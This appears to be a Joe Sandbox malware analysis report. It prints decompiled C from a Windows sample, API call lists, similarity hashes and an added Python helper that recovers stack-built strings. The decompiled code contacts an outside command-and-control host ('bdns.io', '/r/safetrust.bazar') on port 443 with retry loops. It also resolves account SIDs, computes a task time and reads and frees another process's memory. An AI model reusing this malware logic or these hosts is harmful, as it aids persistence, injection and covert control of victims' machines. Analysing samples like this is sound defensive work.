                          				_t181 = 0;
                          				_t176 =  *0x5d9c34; // 0x0
                          				_v1756 = 0;
                          				_v1724.dwLowDateTime = 0;
                          				_v1760 = 0;
                          				_v1764 = 0x200; // 0x200 = 512 wide chars: the cchName capacity passed to LookupAccountSidW (one variable per branch)
                          				_v1768 = 0x200;
                          				_v1728 =  *0x5d9c38 & 0x0000ffff;
                          				_v1732.Value = _t176;
                          				if(_a8 == 0) {
                          					// 8 = TOKEN_QUERY; class 1 = TokenUser; 0x4c = 76 = sizeof(SID_AND_ATTRIBUTES) + SECURITY_MAX_SID_SIZE,
                          					// i.e. a TOKEN_USER with its SID stored inline. The Sid pointer at the head of that buffer
                          					// (_v1636 in the decompiler's naming) is what LookupAccountSidW resolves below.
                          					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v1756) == 0 || GetTokenInformation(_v1756, 1,  &_v1632, 0x4c,  &_v1724) == 0) {
                          						L33:
                          						_t95 = _v1760;
                          						if(_t95 != 0) {
                          							FreeSid(_t95);
                          						}
                          						_t96 = _v1756;
                          						if(_t96 != 0) {
                          							CloseHandle(_t96);
                          						}
                          						goto L37;
                          					} else {
                          						_push( &_v1740);
                          						_push(_t205);
                          						_push( &_v1560);
                          						_push( &_v1768);
                          						_push( &_v1048);
                          						_push(_v1636);
                          						L6:
                          						// Arguments were pushed above (either branch): Sid, Name, &cchName, ReferencedDomainName,
                          						// &cchReferencedDomainName, peUse. Resolves the SID to an account name and its domain.
                          						if(LookupAccountSidW(0, ??, ??, ??, ??, ??, ??) == 0) {
                          							_t181 = 0;
                          							L37:
                          							return _t181;
                          						}
                          						_t104 = _v1768;
                          						_t154 = 0;
                          						if(_v1768 != 0) {
                          							_t169 =  *_t205;
                          							_t154 = 0;
                          							if( *_t205 != 0) {
                          								_t143 = E005C3180(_t169 + _t104 + _t169 + _t104 + 4, 0);
                          								_t222 =  &(_t205[2]);
                          								_t154 = _t143;
                          								E005CC400(_t154,  &_v1560,  *_t222 +  *_t222);
                          								_t223 =  &(_t222[3]);
                          								_t147 =  *_t223;
                          								_t201 =  &(_t154[_t147]);
                          								_t32 = _t147 * 2; // 0x2
                          								 *_t201 = 0x5c; // L'\\': the result is "<domain>\<name>"
                          								E005CC400(_t154 + _t32 + 2,  &_v1048, _v1768 + _v1768);
                          								_t205 =  &(_t223[3]);
                          								 *((short*)(_t201 + 2 + _v1768 * 2)) = 0;
                          							}
                          						}
                          						_t162 =  !=  ? 0x32 : 0x33;
                          						_v1756 = E005C5B70( !=  ? 0x32 : 0x33);
                          						_t184 = E005C3180(0x7d00, 0); // 0x7d00 = 32000-byte output buffer (E005C3180 is the allocator, inferred from its use above)
                          						_t109 = E005D4520(_t108, 0x34); // E005D4520(dst, id) appends string-table entry #id; its return value advances the write cursor (inferred)
                          						_t209 =  &(_t205[5]);
                          						_t192 = _t184 + _t109 * 2;
                          						_v1744 = _t184;
                          						if(_a8 == 0) {
                          							_t193 = _t192 + E005D4520(_t192, 0x36) * 2;
                          							_t111 = E005D4520(_t193, 0x37);
                          							_t211 =  &(_t209[4]);
                          							_t194 = _t193 + _t111 * 2;
                          							_t112 =  *_t154 & 0x0000ffff;
                          							if(_t112 == 0) {
                          								L16:
                          								_t113 = E005D4520(_t194, 0x38);
                          								_t212 =  &(_t211[2]);
                          								_t195 = _t194 + _t113 * 2;
                          								_push(0x39);
                          								goto L17;
                          							}
                          							_t168 =  &(_t154[1]);
                          							do {
                          								 *_t194 = _t112;
                          								_t194 =  &(_t194[0]);
                          								_t112 =  *_t168 & 0x0000ffff;
                          								_t168 =  &(_t168[1]);
                          							} while (_t112 != 0);
                          							goto L16;
                          						} else {
                          							_t141 = E005D4520(_t192, 0x35);
                          							_t212 =  &(_t209[2]);
                          							_t195 = _t192 + _t141 * 2;
                          							_push(0x3a);
                          							L17:
                          							_push(_t195);
                          							_t196 = _t195 + E005D4520() * 2;
                          							_t185 = _t196 + E005D4520(_t196, 0x3b) * 2;
                          							_t197 =  &_v1712;
                          							GetLocalTime(_t197);
                          							SystemTimeToFileTime(_t197,  &_v1724);
                          							_t118 =  &_v1724;
                          							// Add 0x23c34600 = 600,000,000 FILETIME ticks of 100 ns = 60 s to the 64-bit value, carrying into the high dword:
                          							_t118->dwLowDateTime = _t118->dwLowDateTime + 0x23c34600;
                          							asm("adc dword [eax+0x4], 0x0");
                          							FileTimeToSystemTime(_t118, _t197); // _v1712 now holds local time + 1 minute
                          							// Fetch format entry #0x3c, then E005D68E0 formats year/month/day/hour/minute/second into _v1696 (0x1a = 26 wide chars)
                          							E005D4520( &_v536, 0x3c);
                          							_v1752 = _t197->wSecond & 0x0000ffff;
                          							_v1748 = _t197->wDay & 0x0000ffff;
                          							_push(_v1752);
                          							_push(_t197->wMinute & 0x0000ffff);
                          							_push(_t197->wHour & 0x0000ffff);
                          							_push(_v1748);
                          							_push(_t197->wMonth & 0x0000ffff);
                          							E005D68E0( &_v1696, 0x1a,  &_v536, _t197->wYear & 0x0000ffff);
                          							_t216 =  &(_t212[0xf]);
                          							_t129 = _v1696 & 0x0000ffff;
                          							if(_t129 == 0) {
                          								L20:
                          								_t130 = E005D4520(_t185, 0x3d);
                          								_t217 =  &(_t216[2]);
                          								_t164 = _v1756;
                          								_t199 = _t185 + _t130 * 2;
                          								_t131 =  *_t164 & 0x0000ffff;
                          								if(_t131 == 0) {
                          									L23:
                          									_t186 = _a12;
                          									if(_a8 != 0) {
                          										L28:
                          										_t155 = _a4;
                          										_t132 = E005D4520(_t199, 0x3e);
                          										_t165 =  *_t186 & 0x0000ffff;
                          										_t133 = _t199 + _t132 * 2;
                          										if(_t165 == 0) {
                          											L31:
                          											E005D4520(_t133, 0x3f);
                          											_t181 = 1;
                          											 *_t155 = _v1744;
                          											_t136 = _v1756;
                          											if(_v1756 != 0) {
                          												E005C91E0(_t136);
                          											}
                          											goto L33;
                          										}
                          										_t188 =  &(_t186[1]);
                          										do {
                          											 *_t133 = _t165;
                          											_t133 =  &(_t133[0]);
                          											_t165 =  *_t188 & 0x0000ffff;
                          											_t188 =  &(_t188[1]);
                          										} while (_t165 != 0);
                          										goto L31;
                          									}
                          									_t138 = E005D4520(_t199, 0x37);
                          									_t221 =  &(_t217[2]);
                          									_t200 = _t199 + _t138 * 2;
                          									_t139 =  *_t154 & 0x0000ffff;
                          									if(_t139 == 0) {
                          										L27:
                          										_t140 = E005D4520(_t200, 0x38);
                          										_t217 =  &(_t221[2]);
                          										_t199 = _t200 + _t140 * 2;
                          										goto L28;
                          									}
                          									_t156 =  &(_t154[1]);
                          									do {
                          										 *_t200 = _t139;
                          										_t200 =  &(_t200[0]);
                          										_t139 =  *_t156 & 0x0000ffff;
                          										_t156 =  &(_t156[1]);
                          									} while (_t139 != 0);
                          									goto L27;
                          								}
                          								_t166 =  &(_t164[1]);
                          								do {
                          									 *_t199 = _t131;
                          									_t199 =  &(_t199[0]);
                          									_t131 =  *_t166 & 0x0000ffff;
                          									_t166 =  &(_t166[1]);
                          								} while (_t131 != 0);
                          								goto L23;
                          							}
                          							_t167 =  &_v1694;
                          							do {
                          								 *_t185 = _t129;
                          								_t185 =  &(_t185[0]);
                          								_t129 =  *_t167 & 0x0000ffff;
                          								_t167 =  &(_t167[1]);
                          							} while (_t129 != 0);
                          							goto L20;
                          						}
                          					}
                          				}
                          				_t181 = 0;
                          				// One sub-authority, 0x12 = 18, under the identifier authority copied from 0x5d9c34 (0 in this dump);
                          				// if that authority is SECURITY_NT_AUTHORITY the SID is S-1-5-18, LocalSystem.
                          				if(AllocateAndInitializeSid( &_v1732, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1760) == 0) {
                          					goto L33;
                          				} else {
                          					_push( &_v1736);
                          					_push(_t205);
                          					_push( &_v1556);
                          					_push( &_v1764);
                          					_push( &_v1044);
                          					_push(_v1760);
                          					goto L6;
                          				}
                          			}
                          Statement addresses (one entry per line of the C code above, in order):
                          0x005c26d9 0x005c26df 0x005c26e8 0x005c26f7 0x005c26fb 0x005c26ff 0x005c2703 0x005c2707
                          0x005c270a 0x005c270f 0x005c2713 0x005c2773 0x005c2a6c 0x005c2a6c 0x005c2a72 0x005c2a75
                          0x005c2a75 0x005c2a7b 0x005c2a81 0x005c2a84 0x005c2a84 0x00000000 0x005c279c 0x005c27b4
                          0x005c27b5 0x005c27b6 0x005c27b7 0x005c27b8 0x005c27b9 0x005c27c0 0x005c27ca 0x005c28a0
                          0x005c2a8a 0x005c2a93 0x005c2a93 0x005c27d0 0x005c27d6 0x005c27dd 0x005c27df 0x005c27e2
                          0x005c27e9 0x005c27f4 0x005c27f9 0x005c27fc 0x005c280d 0x005c2812 0x005c2815 0x005c281f
                          0x005c2822 0x005c2826 0x005c2834 0x005c2839 0x005c2840 0x005c2840 0x005c27e9 0x005c2858
                          0x005c2864 0x005c2876 0x005c287b 0x005c2880 0x005c2885 0x005c2888 0x005c288c 0x005c28b2
                          0x005c28b8 0x005c28bd 0x005c28c0 0x005c28c3 0x005c28c9 0x005c28df 0x005c28e2 0x005c28e7
                          0x005c28ea 0x005c28ed 0x00000000 0x005c28ed 0x005c28cb 0x005c28ce 0x005c28ce 0x005c28d1
                          0x005c28d4 0x005c28d7 0x005c28da 0x00000000 0x005c288e 0x005c2891 0x005c2896 0x005c2899
                          0x005c289c 0x005c28ef 0x005c28ef 0x005c28f8 0x005c2906 0x005c2909 0x005c290e 0x005c291a
                          0x005c2920 0x005c2924 0x005c292a 0x005c2930 0x005c2940 0x005c2954 0x005c295c 0x005c2967
                          0x005c296b 0x005c296c 0x005c296d 0x005c2971 0x005c2982 0x005c2987 0x005c298e 0x005c2994
                          0x005c29ab 0x005c29ae 0x005c29b3 0x005c29b6 0x005c29ba 0x005c29bd 0x005c29c3 0x005c29d9
                          0x005c29d9 0x005c29e0 0x005c2a1a 0x005c2a1a 0x005c2a20 0x005c2a28 0x005c2a2b 0x005c2a31
                          0x005c2a47 0x005c2a4a 0x005c2a58 0x005c2a59 0x005c2a5b 0x005c2a61 0x005c2a64 0x005c2a69
                          0x00000000 0x005c2a61 0x005c2a33 0x005c2a36 0x005c2a36 0x005c2a39 0x005c2a3c 0x005c2a3f
                          0x005c2a42 0x00000000 0x005c2a36 0x005c29e5 0x005c29ea 0x005c29ed 0x005c29f0 0x005c29f6
                          0x005c2a0c 0x005c2a0f 0x005c2a14 0x005c2a17 0x00000000 0x005c2a17 0x005c29f8 0x005c29fb
                          0x005c29fb 0x005c29fe 0x005c2a01 0x005c2a04 0x005c2a07 0x00000000 0x005c29fb 0x005c29c5
                          0x005c29c8 0x005c29c8 0x005c29cb 0x005c29ce 0x005c29d1 0x005c29d4 0x00000000 0x005c29c8
                          0x005c2996 0x005c299a 0x005c299a 0x005c299d 0x005c29a0 0x005c29a3 0x005c29a6 0x00000000
                          0x005c299a 0x005c288c 0x005c2773 0x005c2719 0x005c2734 0x00000000 0x005c273a 0x005c2752
                          0x005c2753 0x005c2754 0x005c2755 0x005c2756 0x005c2757 0x00000000 0x005c2757

                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C272C
                          • GetCurrentProcess.KERNEL32 ref: 005C275D
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C276B
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenUser),?,0000004C,?), ref: 005C278E
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005C27C2
                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C290E
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 005C291A
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 005C2930
                            • Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15
                          • FreeSid.ADVAPI32(?), ref: 005C2A75
                          • CloseHandle.KERNEL32(?), ref: 005C2A84
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Time$FileProcessSystemToken$AccountAllocateByteCharCloseCurrentFreeHandleInformationInitializeLocalLookupMultiOpenWide
                          • String ID:
                          • API String ID: 348365884-0
                          • Opcode ID: 68ce46df76bbdd3d096f629bbe634598d1fa1f0430b09053e6e0fd5773cb5edb
                          • Instruction ID: abda0d0b1c8123908e9e669ff0e17c2794b9715fa2e52ea0fac46dc509118419
                          • Opcode Fuzzy Hash: 68ce46df76bbdd3d096f629bbe634598d1fa1f0430b09053e6e0fd5773cb5edb
                          • Instruction Fuzzy Hash: CEB1AE71904312AFDB209F54DC45B7BBBE8FF90705F00481EF989A7281E775AA05CB62
                          Uniqueness

                          Uniqueness Score: -1.00%
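The decompiled functions on this page carry their interesting data as 32-bit immediates rather than as strings: the "ZIPA" tag (0x4150495a) in the first fragment, the FILETIME offset 0x23c34600 in E005C26D0, and the two dword stores in E005CAB60 (shown next) that assemble "bdns.io" on the stack. The following helper is an added example written for this page, not code from the sample or from Joe Sandbox. It packs such immediates little-endian and cuts at the NUL, converts FILETIME ticks to seconds, and scans raw x86 bytes for `mov dword [esp+disp8], imm32` / `mov dword [ebp+disp8], imm32` stores so that adjacent stack slots can be rejoined into strings regardless of the order the compiler emitted them. SAMPLE_CODE is constructed by hand to encode the two E005CAB60 stores and is not a dump of the sample; the scanner is a linear byte match, so on real code it should be driven from a disassembler's instruction stream to avoid false matches inside other immediates.

```python
"""Recover stack strings and decode magic immediates from decompiler output.

Added analysis helper for this page; not code from the sample or from Joe Sandbox.
SAMPLE_CODE is constructed to encode the two stores the decompiler shows in
E005CAB60 (_t105[0xf] = 0x736e6462; _t105[0x10] = 0x6f692e); not sample bytes.
"""
import struct
from typing import Dict, List


def decode_stack_string(dwords: List[int]) -> str:
    """Pack 32-bit immediates little-endian (lowest stack slot first), stop at NUL."""
    raw = b"".join(struct.pack("<I", d & 0xFFFFFFFF) for d in dwords)
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def filetime_delta_seconds(ticks: int) -> float:
    """A FILETIME counts 100 ns intervals, so 10,000,000 ticks are one second."""
    return ticks / 10_000_000


# x86 encodings recognised by the scanner (no disassembler, a linear byte scan):
#   C7 44 24 disp8 imm32   mov dword [esp+disp8], imm32   (ModRM 44 + SIB 24: esp base)
#   C7 45    disp8 imm32   mov dword [ebp+disp8], imm32   (ModRM 45: ebp base)
_ESP_STORE = b"\xC7\x44\x24"
_EBP_STORE = b"\xC7\x45"


def find_dword_stores(code: bytes) -> Dict[int, int]:
    """Map signed stack displacement -> imm32 for every matching store in the bytes."""
    stores: Dict[int, int] = {}
    i = 0
    while i < len(code):
        if code.startswith(_ESP_STORE, i) and i + 8 <= len(code):
            disp = struct.unpack_from("<b", code, i + 3)[0]
            stores[disp] = struct.unpack_from("<I", code, i + 4)[0]
            i += 8
        elif code.startswith(_EBP_STORE, i) and i + 7 <= len(code):
            disp = struct.unpack_from("<b", code, i + 2)[0]
            stores[disp] = struct.unpack_from("<I", code, i + 3)[0]
            i += 7
        else:
            i += 1  # not a tracked store; a real tool would step by instruction length
    return stores


def recover_stack_strings(code: bytes, min_len: int = 3) -> Dict[int, str]:
    """Join stores to consecutive 4-byte slots into runs and decode each printable run.

    Store order in the code does not matter (E005CAB60 writes slot 0x10 before 0xf);
    runs are formed by displacement. Returns {start displacement: string}.
    """
    stores = find_dword_stores(code)
    out: Dict[int, str] = {}
    run_start, run = None, []
    for disp in sorted(stores):
        if run and disp == run_start + 4 * len(run):
            run.append(stores[disp])
            continue
        _flush(out, run_start, run, min_len)
        run_start, run = disp, [stores[disp]]
    _flush(out, run_start, run, min_len)
    return out


def _flush(out: Dict[int, str], start, run: List[int], min_len: int) -> None:
    if not run:
        return
    text = decode_stack_string(run)
    if len(text) >= min_len and text.isprintable():
        out[start] = text


# Constructed bytes (not from the sample): the two E005CAB60 stores at esp+0x3c and
# esp+0x40 with an unrelated instruction between them.
SAMPLE_CODE = bytes.fromhex(
    "C74424402E696F00"  # mov dword [esp+0x40], 0x006f692e  (".io\0")
    "33C0"              # xor eax, eax
    "C744243C62646E73"  # mov dword [esp+0x3c], 0x736e6462  ("bdns")
)


if __name__ == "__main__":
    print(recover_stack_strings(SAMPLE_CODE))   # {60: 'bdns.io'}
    print(decode_stack_string([0x4150495A]))     # ZIPA  (first fragment above)
    print(decode_stack_string([0x66666667]))     # gfff  (this report's "String ID")
    print(filetime_delta_seconds(0x23C34600))    # 60.0  (E005C26D0 time offset)
```

The "String ID: gfff" in the report's Similarity block is what the dword 0x66666667 looks like when read as text; that value is the multiplier compilers emit for division by 10, so it is most likely a constant rather than a real string, and the decoder makes that easy to check.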

                          C-Code - Quality: 100%
                          			E005CAB60(void* __eflags) {
                          				void* _t42;
                          				void* _t55;
                          				signed int _t59;
                          				signed int _t60;
                          				signed int _t61;
                          				signed int _t62;
                          				signed int _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				signed int* _t72;
                          				signed int _t73;
                          				void* _t74;
                          				void* _t82;
                          				signed int _t89;
                          				signed int _t90;
                          				void* _t91;
                          				signed int _t95;
                          				signed int _t96;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t100;
                          				signed int _t103;
                          				signed int _t104;
                          				signed int* _t105;
                          
                          				_t94 =  &(_t105[9]);
                          				E005CD8B0( &(_t105[9]));
                          				_t99 =  &(_t105[4]);
                          				_t72 =  &(_t105[0xf]);
                          				_t104 = 0;
                          				 *_t105 = 0;
                          				_t105[3] = 0;
                          				_t105[4] = 0;
                          				_t105[2] = 0;
                          				_t105[1] = 0;
                          				while(1) {
                          					_t105[0x10] = 0x6f692e;
                          					_t105[0xf] = 0x736e6462;
                          					_t42 = E005CC380(_t72, 0xfde9, _t99, 0xffffffff);
                          					_t105 =  &(_t105[4]);
                          					if(_t42 == 0) {
                          						break;
                          					}
                          					if(E005CF070(_t94, _t105[5], 0x1bb) == 0) {
                          						L6:
                          						_t104 = _t104 + 1;
                          						Sleep(0x4e20);
                          						if(_t104 < 0x1e) {
                          							continue;
                          						}
                          						break;
                          					}
                          					_t105[0x13] = 0x7261;
                          					_t105[0x12] = 0x7a61622e;
                          					_t105[0x11] = 0x74737572;
                          					_t105[0x10] = 0x74656661;
                          					_t105[0xf] = 0x732f722f;
                          					_t55 = E005CC380(_t72, 0xfde9,  &(_t105[3]), 0xffffffff);
                          					_t105 =  &(_t105[4]);
                          					if(_t55 == 0) {
                          						break;
                          					}
                          					if(E005C5A50(_t94, _t105[3],  &(_t105[7])) == 0 || _t105[7] != 0xc8) {
                          						goto L6;
                          					} else {
                          						_t59 = E005C7F10( &(_t105[9]),  &(_t105[1]),  &(_t105[8]));
                          						__eflags = _t59;
                          						if(_t59 == 0) {
                          							break;
                          						}
                          						_t89 = _t105[8];
                          						__eflags = _t89 - 7;
                          						if(_t89 < 7) {
                          							break;
                          						}
                          						_t60 = _t105[1];
                          						__eflags = _t89;
                          						_t82 = _t60 + _t89;
                          						if(_t89 <= 0) {
                          							L21:
                          							__eflags = _t60 - _t82;
                          							_t90 = _t60;
                          							if(_t60 >= _t82) {
                          								L26:
                          								_t91 = _t90 - _t60;
                          								__eflags = _t91 - 7 - 8;
                          								if(_t91 - 7 > 8) {
                          									break;
                          								}
                          								_t61 = E005CC380(_t60, 0,  &(_t105[3]), _t91);
                          								_t105 =  &(_t105[4]);
                          								_t73 = _t105[0x2d];
                          								__eflags = _t61;
                          								if(_t61 == 0) {
                          									break;
                          								}
                          								_t100 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_t62 = E005D6BD0(_t73, __eflags, _t105[4], 0x1bb);
                          									__eflags = _t62;
                          									if(_t62 != 0) {
                          										break;
                          									}
                          									_t100 = _t100 + 1;
                          									Sleep(0x7530);
                          									__eflags = _t100 - 0x14;
                          									if(__eflags < 0) {
                          										continue;
                          									}
                          									__eflags = _t100 - 0x14;
                          									 *_t105 = 0;
                          									if(_t100 == 0x14) {
                          										goto L7;
                          									}
                          									break;
                          								}
                          								_t101 =  &(_t105[6]);
                          								_t95 = 0;
                          								__eflags = 0;
                          								_t105[6] = 0;
                          								while(1) {
                          									_t63 = E005C5960(__eflags, _t73, _t101);
                          									_t105 =  &(_t105[2]);
                          									__eflags = _t63;
                          									if(_t63 == 0) {
                          										break;
                          									}
                          									_t95 = _t95 + 1;
                          									Sleep(0x7530);
                          									__eflags = _t95 - 0x14;
                          									if(__eflags < 0) {
                          										continue;
                          									}
                          									if(__eflags != 0) {
                          										L39:
                          										_t102 =  &(_t105[5]);
                          										_t97 = 0;
                          										__eflags = 0;
                          										_t105[5] = 0;
                          										while(1) {
                          											_t64 = E005C3C40(_t73, _t102);
                          											_t105 =  &(_t105[2]);
                          											__eflags = _t64;
                          											if(_t64 == 0) {
                          												break;
                          											}
                          											_t97 = _t97 + 1;
                          											Sleep(0x7530);
                          											__eflags = _t97 - 0x14;
                          											if(__eflags < 0) {
                          												continue;
                          											}
                          											if(__eflags != 0) {
                          												L46:
                          												_t103 = 0;
                          												__eflags = 0;
                          												while(1) {
                          													_t65 = E005C9060(_t73, 0x5d9ac8);
                          													_t105 =  &(_t105[2]);
                          													__eflags = _t65;
                          													if(_t65 != 0) {
                          														break;
                          													}
                          													_t103 = _t103 + 1;
                          													Sleep(0x7530);
                          													__eflags = _t103 - 0x64;
                          													if(_t103 < 0x64) {
                          														continue;
                          													}
                          													break;
                          												}
                          												__eflags = _t103 - 0x64;
                          												 *_t105 = 0 | _t103 != 0x00000064;
                          												goto L7;
                          											}
                          											L43:
                          											 *_t105 = 0;
                          											goto L7;
                          										}
                          										_t98 = _t105[5];
                          										__eflags = _t98;
                          										if(_t98 != 0) {
                          											E005C9510(_t98);
                          											L005D7400(_t98);
                          											_t105 =  &(_t105[1]);
                          										}
                          										goto L46;
                          									}
                          									goto L43;
                          								}
                          								_t96 = _t105[6];
                          								__eflags = _t96;
                          								if(_t96 != 0) {
                          									L005D1F70(_t63);
                          									L005D7400(_t96);
                          									_t105 =  &(_t105[1]);
                          								}
                          								goto L39;
                          							}
                          							_t90 = _t60;
                          							do {
                          								_t74 =  *_t90;
                          								__eflags = _t74 - 0x2e;
                          								if(_t74 == 0x2e) {
                          									goto L25;
                          								}
                          								__eflags = _t74 + 0xd0 - 9;
                          								if(_t74 + 0xd0 > 9) {
                          									goto L26;
                          								}
                          								L25:
                          								_t90 = _t90 + 1;
                          								__eflags = _t90 - _t82;
                          							} while (_t90 < _t82);
                          							goto L26;
                          						} else {
                          							goto L19;
                          						}
                          						while(1) {
                          							L19:
                          							__eflags =  *_t60 + 0xd0 - 0xa;
                          							if( *_t60 + 0xd0 < 0xa) {
                          								goto L21;
                          							}
                          							_t60 = _t60 + 1;
                          							__eflags = _t60 - _t82;
                          							if(_t60 < _t82) {
                          								continue;
                          							}
                          							goto L21;
                          						}
                          						goto L21;
                          					}
                          				}
                          				L7:
                          				_t43 = _t105[3];
                          				if(_t105[3] != 0) {
                          					E005C91E0(_t43);
                          					_t105 =  &(_t105[1]);
                          				}
                          				_t44 = _t105[4];
                          				if(_t105[4] != 0) {
                          					E005C91E0(_t44);
                          					_t105 =  &(_t105[1]);
                          				}
                          				_t45 = _t105[2];
                          				if(_t105[2] != 0) {
                          					E005C91E0(_t45);
                          					_t105 =  &(_t105[1]);
                          				}
                          				_t46 = _t105[1];
                          				if(_t105[1] != 0) {
                          					E005C91E0(_t46);
                          					_t105 =  &(_t105[1]);
                          				}
                          				E005D19C0( &(_t105[9]));
                          				return  *_t105;
                          			}

                          APIs
                            • Part of subcall function 005CD8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
                            • Part of subcall function 005CD8B0: RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
                            • Part of subcall function 005CD8B0: RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4
                          • Sleep.KERNEL32(00004E20,?,000001BB), ref: 005CAC3A
                          • Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAD44
                          • Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAD7F
                          • Sleep.KERNEL32(00007530,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CADC6
                          • Sleep.KERNEL32(00007530,?,?,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAE11
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Sleep$CriticalSection$ByteCharMultiWide$CountEnterInitializeLeaveSpin
                          • String ID: .baz$/r/s$afet$ar$rust
                          • API String ID: 2543766595-2414577613
                          • Opcode ID: 40fe8b4e04c26d6e6230fe2bc5a90611760b134e1160e3410be2111cb81331cc
                          • Instruction ID: 72cf48a028fc88d76943f3fbb43539ff957cdb00bd110d7330aa4f760bcbec33
                          • Opcode Fuzzy Hash: 40fe8b4e04c26d6e6230fe2bc5a90611760b134e1160e3410be2111cb81331cc
                          • Instruction Fuzzy Hash: 4B71A0B160430A9FD720ABB59C49F6BBFAABF90708F04481DF48696192EB34DD44C757
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E005CC110(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                          				char _v20;
                          				long _v24;
                          				void* _v28;
                          				void* _v32;
                          				void* _v36;
                          				void* _t47;
                          				void* _t50;
                          				void* _t51;
                          				void* _t52;
                          				void* _t66;
                          				signed int _t67;
                          				void* _t70;
                          				intOrPtr _t73;
                          				void* _t74;
                          				void* _t76;
                          				DWORD* _t77;
                          				DWORD* _t80;
                          				intOrPtr _t83;
                          				void* _t84;
                          				void* _t85;
                          				intOrPtr _t86;
                          				void* _t87;
                          				void* _t89;
                          				long* _t90;
                          				long* _t91;
                          
                          				_t90 =  &_v24;
                          				 *_t90 = 0;
                          				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
                          					L44:
                          					return 0;
                          				}
                          				_t88 = _a8;
                          				_t73 = _a12;
                          				_t87 = __ecx;
                          				if(_a8 != 0 || _t73 == 0) {
                          					_t83 = _a4;
                          					_t47 = 0;
                          					_v36 = 0;
                          					if(_t83 == 0) {
                          						L5:
                          						_v28 = _t47;
                          						if(_t73 == 0) {
                          							L7:
                          							_t84 = _a16;
                          							_t76 = 0;
                          							_t89 = 0;
                          							if(_t84 == 0) {
                          								L9:
                          								_t48 = _a20;
                          								if(_a20 == 0) {
                          									L19:
                          									_push(0);
                          									_push( *((intOrPtr*)(_t87 + 0x94)));
                          									_push( *((intOrPtr*)(_t87 + 0x9c)));
                          									_v32 = _t76;
                          									_push(_t76);
                          									_push(_t89);
                          									_push(_t73);
                          									_push(_v36);
                          									_push(_v28);
                          									_push(_t90);
                          									_push(8);
                          									_push( *((intOrPtr*)(_t87 + 0xa0)));
                          									_push(_t87);
                          									_t50 = E005D3FA0();
                          									_t91 =  &(_t90[0xc]);
                          									if(_t50 == 0) {
                          										_t74 = _t84;
                          										L31:
                          										_t51 = _v32;
                          										if(_t51 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _t51, 0, 0x8000);
                          										}
                          										_t84 = _t74;
                          										L34:
                          										if(_t89 != 0) {
                          											_t77 =  &_v20;
                          											 *_t77 = 0;
                          											if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t77) == 0 || _v20 != 0x400) {
                          												 *_t91 = 0;
                          											}
                          											VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
                          										}
                          										L39:
                          										if(_v36 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _v36, 0, 0x8000);
                          										}
                          										L41:
                          										_t52 = _v28;
                          										if(_t52 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _t52, 0, 0x8000);
                          										}
                          										L43:
                          										return  *_t91;
                          									}
                          									 *(_t87 + 0x44) =  *_t91;
                          									if(_t89 != 0) {
                          										_t80 =  &_v24;
                          										 *_t80 = 0;
                          										if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t80) == 0 || _v24 != 0x400) {
                          											 *_t91 = 0;
                          										}
                          										VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
                          									}
                          									_t74 = _t84;
                          									_t85 = 0;
                          									while(1) {
                          										_push(1);
                          										if(E005D5020(_t87, 0) != 0) {
                          											break;
                          										}
